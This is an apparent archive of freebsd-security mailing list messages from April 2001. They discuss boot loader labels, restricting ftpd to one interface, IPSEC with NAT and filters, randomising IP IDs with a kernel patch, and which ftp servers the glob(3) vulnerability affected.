Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 16 Apr 2001 17:32:37.0943 (UTC) FILETIME=[3B0ECC70:01C0C69B] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This doesn't pertain to security so I will probably be flamed for this email, but I am in urgvent need of an answer to a simple FreeBSD boot Question. I am duel booting a Windows 2000 machine and FreeBSD 4.3RC2 and using the Fbsd boot loader. The Boot Loader appears like this: F1: ?? F3: FreeBSD F5: Drive 1 Default : F3 /* Or the OS that I booted last */ I want to be able the change the ?? to say Windows 2000 and have the Defualt OS boot windows 2000 even iuf my last boot was FBSD (Personally I dont mind things but guests who use this computer always get confused and press F5 or something). If anyone can help or point me in the direction of a HOW-TO I would greatly appreciate it. Nick MAzza _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 10:44: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id 7EA6637B423 for ; Mon, 16 Apr 2001 10:44:02 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr5.exu.ericsson.se (mr5u3.ericy.com [208.237.135.124]) by imr1.ericy.com (8.10.2/8.10.2) with ESMTP id f3GHi0B15881; Mon, 16 Apr 2001 12:44:00 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr5.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f3GHhv627750; Mon, 16 Apr 2001 12:43:58 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f3GHhup09258; Mon, 16 Apr 2001 13:43:56 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id <2TN8RD0N>; Mon, 16 Apr 2001 13:43:55 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 2N3XJG0M; Mon, 16 Apr 2001 13:43:46 -0400 From: "Antoine Beaupre (LMC)" Reply-To: /dev/null@ericsson.ca To: Nick Mazza Cc: security@FreeBSD.ORG Message-ID: <3ADB2F50.A66BFFD8@lmc.ericsson.se> Date: Mon, 16 Apr 2001 13:43:44 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: FreeBSD Login References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is indeed not the place to ask. the questions mailing list is the place for general questions. But even then, you should have checked the existing documentation. A 30 seconds search on FreeBSD main website (http://www.FreeBSD.org/cgi/search.cgi?words=dual+boot&max=50&source=www) lead me to http://www.freebsd.org/handbook/boot.html at first, and more importantly: http://www.freebsd.org/tutorials/multi-os/ch5.html, at last. I recommend you the OS-BS boot manager. A. Nick Mazza wrote: > > This doesn't pertain to security so I will probably be flamed for this > email, but I am in urgvent need of an answer to a simple FreeBSD boot > Question. I am duel booting a Windows 2000 machine and FreeBSD 4.3RC2 and > using the Fbsd boot loader. The Boot Loader appears like this: > > F1: ?? > F3: FreeBSD > F5: Drive 1 > > Default : F3 /* Or the OS that I booted last */ > > I want to be able the change the ?? to say Windows 2000 and have the Defualt > OS boot windows 2000 even iuf my last boot was FBSD (Personally I dont mind > things but guests who use this computer always get confused and press F5 or > something). If anyone can help or point me in the direction of a HOW-TO I > would greatly appreciate it. > > Nick MAzza > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 10:55:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 664C037B424 for ; Mon, 16 Apr 2001 10:55:21 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 29F77BA4E; Mon, 16 Apr 2001 12:54:15 -0500 (CDT) Message-ID: <032c01c0c69e$5e81c830$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: , "Nick Mazza" Cc: References: <3ADB2F50.A66BFFD8@lmc.ericsson.se> Subject: Re: FreeBSD Login Date: Mon, 16 Apr 2001 12:55:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, I believe he just wants to change the label. FWIW -- it used to identifiy Windows 2000 as Windows NT in the FreeBSD 4.2-RELEASE. They changed it and now it shows ???. It will still boot just fine. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Antoine Beaupre (LMC)" To: "Nick Mazza" Cc: Sent: Monday, April 16, 2001 12:43 PM Subject: Re: FreeBSD Login > This is indeed not the place to ask. the questions mailing list is the > place for general questions. > > But even then, you should have checked the existing documentation. > > A 30 seconds search on FreeBSD main website > (http://www.FreeBSD.org/cgi/search.cgi?words=dual+boot&max=50&source=www) > lead me to http://www.freebsd.org/handbook/boot.html at first, and more > importantly: http://www.freebsd.org/tutorials/multi-os/ch5.html, at > last. > > I recommend you the OS-BS boot manager. > > A. > > Nick Mazza wrote: > > > > This doesn't pertain to security so I will probably be flamed for this > > email, but I am in urgvent need of an answer to a simple FreeBSD boot > > Question. I am duel booting a Windows 2000 machine and FreeBSD 4.3RC2 and > > using the Fbsd boot loader. The Boot Loader appears like this: > > > > F1: ?? > > F3: FreeBSD > > F5: Drive 1 > > > > Default : F3 /* Or the OS that I booted last */ > > > > I want to be able the change the ?? to say Windows 2000 and have the Defualt > > OS boot windows 2000 even iuf my last boot was FBSD (Personally I dont mind > > things but guests who use this computer always get confused and press F5 or > > something). If anyone can help or point me in the direction of a HOW-TO I > > would greatly appreciate it. > > > > Nick MAzza > > _________________________________________________________________ > > Get your FREE download of MSN Explorer at http://explorer.msn.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > La sémantique est la gravité de l'abstraction. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 10:59:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from embelia.wanadoo.fr (smtp-rt-7.wanadoo.fr [193.252.19.161]) by hub.freebsd.org (Postfix) with ESMTP id CB77D37B42C for ; Mon, 16 Apr 2001 10:59:46 -0700 (PDT) (envelope-from khaddad@wanadoo.fr) Received: from mahonia.wanadoo.fr (193.252.19.58) by embelia.wanadoo.fr; 16 Apr 2001 19:59:44 +0200 Received: from KHALIL (193.251.55.96) by mahonia.wanadoo.fr; 16 Apr 2001 19:59:20 +0200 Message-ID: <001c01c0c69e$d44889f0$0200a8c0@khalil> From: "Khalil Haddad" To: "Fernando Schapachnik" Cc: References: <200104161651.NAA26855@ns1.via-net-works.net.ar> Subject: Re: FTP - block outer connections Date: Mon, 16 Apr 2001 19:58:23 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org thx for your answer i changed my hosts.allow and made a rule to deny all and to allow only the ip of the machine i want to ftp in but how do you make the changes to take effect ? i did not find this in the man pages (other than reboot) thx! ----- Original Message ----- From: "Fernando Schapachnik" To: "Khalil Haddad" Cc: Sent: Monday, April 16, 2001 6:51 PM Subject: Re: FTP - block outer connections > Look at man 5 hosts_access, this should help. > > Regards. > > En un mensaje anterior, Khalil Haddad escribió: > > Hello all > > i got an FBSD box running FTPD > > I would like to listen only to ONE of my nic cards , ie the one that is not > > connected to the net anyone can help me securing it ? > > > > thanx > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > Fernando P. Schapachnik > Planificación de red y tecnología > VIA NET.WORKS ARGENTINA S.A. > fschapachnik@vianetworks.com.ar > Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11: 2:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0FD0137B423 for ; Mon, 16 Apr 2001 11:02:26 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA30759; Mon, 16 Apr 2001 11:01:53 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda30757; Mon Apr 16 11:01:35 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GI1Tu05323; Mon, 16 Apr 2001 11:01:29 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdCO5316; Mon Apr 16 11:01:18 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GI1Ij05957; Mon, 16 Apr 2001 11:01:18 -0700 (PDT) Message-Id: <200104161801.f3GI1Ij05957@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdOE5953; Mon Apr 16 11:00:58 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: "David Erickson" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSEC/VPN/NAT and filtering In-reply-to: Your message of "Sat, 14 Apr 2001 07:58:43 EDT." <001a01c0c4da$40f0a040$1902a8c0@mddsg.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 11:00:58 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <001a01c0c4da$40f0a040$1902a8c0@mddsg.com>, "David Erickson" writes: > I do not know about your particular situation however. I am doing NAT'd > IPSec all the time to work with a Checkpoint Firewall. You just have to > configure the firewall to accept NAT'd connections in v4.1 sp1 and in sp3 > the support is even better. > > Dave Wouldn't that depend on whether you're using tunnel v.s. transport mode IPSec? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC > ----- Original Message ----- > From: "Mike Harding" > To: > Sent: Wednesday, March 21, 2001 12:36 PM > Subject: IPSEC/VPN/NAT and filtering > > > > > > It's possible to use IPSEC on a box with NAT, but you don't want to > > NAT the ipsec tunnel. What worked for me was to create an ESP tunnel > > and then route traffic to the remote net to lo0. It then gets > > encapsulated and sent out the external interface. NAT is not invoked > > because the traffic no longer looks like your internal network. > > > > IPSEC does _not_ play happy with packed filters on the same > > box... here's an extract from a recent e-mail to kris... > > > > I would like to see all of this fixed and working, I'll write a > > handbook entry and do coding as well.... > > > - Mike Harding > > > > (extracted from a letter to kris...) > > > > I have seen your name on a few exchanges and you seem to be a likely > > person to discuss this with. The issue is using IPSEC and ipfilter > > (or ipfw) together on the same box. I think I have a relatively > > simple way to deal with getting this to work properly. > > > > The current problem is that if you use ESP tunnel mode, or transport > > mode for that matter, the KAME code rewrites the packet contents, and > > then requeues the packet for further routing. See line 398 in > > esp_input.c for -STABLE. It does NOT change the interface, so you > > can't tell this packet from one that comes in via the hardware device. > > Apparently there is a bit flipped indicating that this is a ipsec'd > > packet, but the current packet filters don't appear to take advantage > > of it. > > > > My modest proposal would be to have a sysctl variable to indicate an > > alternate interface to reinject the decrypted packets (like a local > > loopback, the default or maybe a new one, lo1). Then you know that > > anything coming in that interface was inserted by the KAME stack and > > you can apply filtering to it. This would allow firewall and IPSEC > > gateway functionality to be put into the same box. > > > > You can use the 'gif' device for tunnelling, but we are trying to > > interoperate with a cisco box (politics). There is also pipsecd, > > which would work, but there is no IKE daemon for it. > > > > I think we will work around this by putting another packet filter in > > front of the IPSEC box, but this would be very useful in general I > > think... > > > > How does this proposal sound? I know the OpenBSD folk put some effort > > into getting ipfilter and IPSEC to 'play nice'... it would be a shame > > to have to use 2 boxes or switch OSes to support this. > > > > I am willing to write a section in the handbook on this once I have it > > set up correctly, a box with NAT, VPN, and ipfilter (and alternately > > IPFW). > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11: 4:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from male.aldigital.co.uk (male.aldigital.co.uk [194.128.162.11]) by hub.freebsd.org (Postfix) with ESMTP id 7614237B424 for ; Mon, 16 Apr 2001 11:04:23 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk (socks.aldigital.co.uk [194.128.162.10]) by male.aldigital.co.uk (Postfix) with ESMTP id DC6196A1411; Mon, 16 Apr 2001 18:01:03 +0000 (GMT) Message-ID: <3ADB4050.855FE1F6@algroup.co.uk> Date: Mon, 16 Apr 2001 19:56:16 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Khalil Haddad Cc: security@FreeBSD.ORG Subject: Re: FTP - block outer connections References: <002701c0c694$6774ef30$0200a8c0@khalil> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Khalil Haddad wrote: > > Hello all > i got an FBSD box running FTPD > I would like to listen only to ONE of my nic cards , ie the one that is not > connected to the net anyone can help me securing it ? remove ftp from /etc/inetd.conf and run it as a daemon instead: ftpd -D -a cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11:31:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id C887237B43F; Mon, 16 Apr 2001 11:31:14 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id EAA01848; Tue, 17 Apr 2001 04:30:40 +1000 (EST) From: Darren Reed Message-Id: <200104161830.EAA01848@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: wes@softweyr.com (Wes Peters) Date: Tue, 17 Apr 2001 04:30:40 +1000 (Australia/ACT) Cc: kris@obsecurity.org (Kris Kennaway), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <3ADB0389.5D236D88@softweyr.com> from "Wes Peters" at Apr 16, 2001 08:36:57 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Wes Peters, sie said: > > Kris Kennaway wrote: > > > > On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote: > > > > > Each IP packet sent has with it a 16-bit ID. The numbers must remain > > > unique over a short period of time so fragmentation can work properly. As > > > such, everything except recent openbsds simple increments the id by 1 for > > > each packet sent out. > > > > > > As a result, you can tell the number of packets sent on an idle host by > > > seeing the difference in id numbers for the packets it sends back to you. > > > It's not really that important of an issue, don't worry about it. > > > > Here's a patch ported from OpenBSD which randomizes this (supposedly > > such that it respects the constraint of not wrapping within the > > prescribed time period). I should wrap it in a sysctl, I guess. > > > > http://www.freebsd.org/~kris/ipid.patch > > > > Comments? > > Looks clean. The only comment I can find is: Why not have ip_randomid() > return the ID in network byte order? It would save several HTONS macros > trailing the ip_randomid() calls. Why do it at all ? Why do you want to covert an opaque number from one byte format to the other? The only reason ip_id should be being converted *FROM* network byte order to host byte order is for display purposes. If you disagree with me, think for a moment about what it *really* is. Afterall, two random bytes are two random bytes, regardless of which is first. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11:36:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id DD97837B43C; Mon, 16 Apr 2001 11:36:37 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id EAA03291; Tue, 17 Apr 2001 04:36:16 +1000 (EST) From: Darren Reed Message-Id: <200104161836.EAA03291@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: kris@obsecurity.org (Kris Kennaway) Date: Tue, 17 Apr 2001 04:36:15 +1000 (Australia/ACT) Cc: kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <20010416024805.A688@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 02:48:05 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Kris Kennaway, sie said: > > > --rwEMma7ioTxnRzrJ > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > > > Here's a patch ported from OpenBSD which randomizes this (supposedly > > such that it respects the constraint of not wrapping within the > > prescribed time period). I should wrap it in a sysctl, I guess. > >=20 > > http://www.freebsd.org/~kris/ipid.patch > > Okay, I did this and updated the patch, with the sysctl defaulting to > off since the random algorithm does add some amount of overhead. > > > Comments? You should optimize it for mod being 2^n-1 (or make that a requirement). Also, drop the HTONS statements, they no longer make sense. Before ip_id was a counter and so it made sense (sorta) to change its byte ordering to network. Now it's just a random number so there is no longer any need. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11:47:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0BBAA37B43C for ; Mon, 16 Apr 2001 11:47:47 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA30884; Mon, 16 Apr 2001 11:47:14 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda30882; Mon Apr 16 11:47:03 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GIkwY05897; Mon, 16 Apr 2001 11:46:58 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdSO5891; Mon Apr 16 11:46:21 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GIkL206263; Mon, 16 Apr 2001 11:46:21 -0700 (PDT) Message-Id: <200104161846.f3GIkL206263@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdmK6257; Mon Apr 16 11:45:29 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Igor Roshchin Cc: security@FreeBSD.ORG Subject: Re: Wu-ftpd and Remote BSD ftpd glob exploit In-reply-to: Your message of "Mon, 16 Apr 2001 11:16:06 EDT." <200104161516.LAA70850@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 11:45:29 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200104161516.LAA70850@giganda.komkon.org>, Igor Roshchin writes: > > > > Can anybody, please, tell explicitly, or point me to a posting/URL with an > answer to the question: > "Is Wu-ftpd server [and derived from it] also vulnerable ? " > > So far I saw neither positive nor negative identification, but > maybe I missed one. Any application, local or remote, that uses the FreeBSD glob(3) function would have been vulnerable prior to the correction date. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12: 6:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 9984A37B43F; Mon, 16 Apr 2001 12:06:30 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3B228678B7; Mon, 16 Apr 2001 12:06:30 -0700 (PDT) Date: Mon, 16 Apr 2001 12:06:30 -0700 From: Kris Kennaway To: Darren Reed Cc: Kris Kennaway , Mike Silbersack , Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416120630.C10023@xor.obsecurity.org> References: <20010416024805.A688@xor.obsecurity.org> <200104161836.EAA03291@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TYecfFk8j8mZq+dy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104161836.EAA03291@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 04:36:15AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --TYecfFk8j8mZq+dy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Apr 17, 2001 at 04:36:15AM +1000, Darren Reed wrote: > You should optimize it for mod being 2^n-1 (or make that a requirement). I'm afraid I don't have time to look at this right now. Perhaps it can be revisited (the sysctl defaults to off for now), or Niels Provos may be interested in the idea. > Also, drop the HTONS statements, they no longer make sense. Before ip_id > was a counter and so it made sense (sorta) to change its byte ordering to > network. Now it's just a random number so there is no longer any need. Well, it still has wrapping properties like a network-order counter, i.e. the algorithm attempts to order the output so that it doesn't wrap within the segment lifetime. That would be lost without using HTONS. Kris --TYecfFk8j8mZq+dy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE620K1Wry0BWjoQKURAn72AJ9LgQ5HdeYEA09g3tA15l62W75dYwCg9pZd g3J2gozaTEXPWVstnZjh9ts= =LYF5 -----END PGP SIGNATURE----- --TYecfFk8j8mZq+dy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:10:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id BB9E737B42C; Mon, 16 Apr 2001 12:10:20 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C7B1B66D8B; Mon, 16 Apr 2001 12:10:19 -0700 (PDT) Date: Mon, 16 Apr 2001 12:10:19 -0700 From: Kris Kennaway To: Wes Peters Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416121019.D10023@xor.obsecurity.org> References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org> <3ADB0389.5D236D88@softweyr.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="zbGR4y+acU1DwHSi" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADB0389.5D236D88@softweyr.com>; from wes@softweyr.com on Mon, Apr 16, 2001 at 08:36:57AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --zbGR4y+acU1DwHSi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Apr 16, 2001 at 08:36:57AM -0600, Wes Peters wrote: > Looks clean. The only comment I can find is: Why not have ip_randomid() > return the ID in network byte order? It would save several HTONS macros > trailing the ip_randomid() calls. I can't think of anything off the top of my head, but there was some reason why OpenBSD made this change: diff -u -r1.12 -r1.13 --- ip_mroute.c 1999/01/08 01:04:17 1.12 +++ ip_mroute.c 1999/01/08 21:51:22 1.13 @@ -1397,7 +1397,8 @@ */ ip_copy = mtod(mb_copy, struct ip *); *ip_copy = multicast_encap_iphdr; - ip_copy->ip_id = htons(ip_randomid()); + ip_copy->ip_id = ip_randomid(); + HTONS(ip_copy->ip_id); ip_copy->ip_len = len; ip_copy->ip_src = vifp->v_lcl_addr; ip_copy->ip_dst = vifp->v_rmt_addr; Presumably there was some reasoning there. Niels, can you shed any light? Kris --zbGR4y+acU1DwHSi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE620ObWry0BWjoQKURAuUHAKCdHQSfWDRrszsnqghfWJ7GduljdwCgrCzh VXHsMlwwU2Z8rsVXQhbiVlo= =beZj -----END PGP SIGNATURE----- --zbGR4y+acU1DwHSi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:16: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2D72237B43C for ; Mon, 16 Apr 2001 12:16:02 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA31026; Mon, 16 Apr 2001 12:15:35 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda31024; Mon Apr 16 12:15:23 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GJFIa06170; Mon, 16 Apr 2001 12:15:18 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdRn6161; Mon Apr 16 12:14:23 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GJEMh06453; Mon, 16 Apr 2001 12:14:22 -0700 (PDT) Message-Id: <200104161914.f3GJEMh06453@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdav6448; Mon Apr 16 12:14:05 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Brian Candler Cc: Lowell Gilbert , Rasputin , freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd In-reply-to: Your message of "Mon, 16 Apr 2001 11:23:58 BST." <20010416112358.A13561@linnet.org> Mime-Version: 1.0 